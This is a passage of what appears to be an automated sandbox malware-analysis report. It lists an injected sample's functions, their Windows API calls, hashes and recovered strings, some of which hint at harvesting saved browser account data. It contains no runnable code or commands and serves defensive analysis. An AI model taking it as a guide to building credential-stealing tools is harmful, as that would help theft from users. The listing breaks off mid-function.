                                                                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                            Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnumNamesResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3334572018-0
                                                                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                            Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                            Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFind
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                            Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                            Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                            Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                            • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                            Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3655998216-0
                                                                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                            Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 00445426
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1828521557-0
                                                                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                            Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@FilePointermemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 609303285-0
                                                                                                                                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                            Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2136311172-0
                                                                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                            Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@??3@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1936579350-0
                                                                                                                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                            Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                            Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                            Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                            • free.MSVCRT ref: 00418370
                                                                                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76E1DF80,?,0041755F,?), ref: 00417452
                                                                                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                            • String ID: OsError 0x%x (%u)
                                                                                                                                            • API String ID: 2360000266-2664311388
                                                                                                                                            • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                            • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                            • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                            • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                            Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                            • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                            • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                            • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                            Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                            • memset.MSVCRT ref: 0040265F
                                                                                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                            • API String ID: 577499730-1134094380
                                                                                                                                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                            Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                            • GetDC.USER32 ref: 004140E3
                                                                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                                                                            • API String ID: 2080319088-3046471546
                                                                                                                                            • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                            • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                            • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                            • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                            Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
